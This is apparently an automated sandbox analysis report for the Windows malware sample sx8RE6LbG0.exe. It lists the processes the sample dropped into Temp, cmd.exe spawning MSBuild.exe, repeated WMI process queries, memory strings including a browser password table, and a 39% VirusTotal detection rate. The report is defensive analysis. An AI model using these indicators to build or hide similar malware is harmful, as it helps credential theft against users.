Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6196
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u2ts.0.exe, u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u2ts.0.exe, 00000002.00000003.2097967971.00000000220C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: sx8RE6LbG0.exe

Virustotal: Detection: 39%

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File read: C:\Users\user\Desktop\sx8RE6LbG0.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sx8RE6LbG0.exe "C:\Users\user\Desktop\sx8RE6LbG0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 2004
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
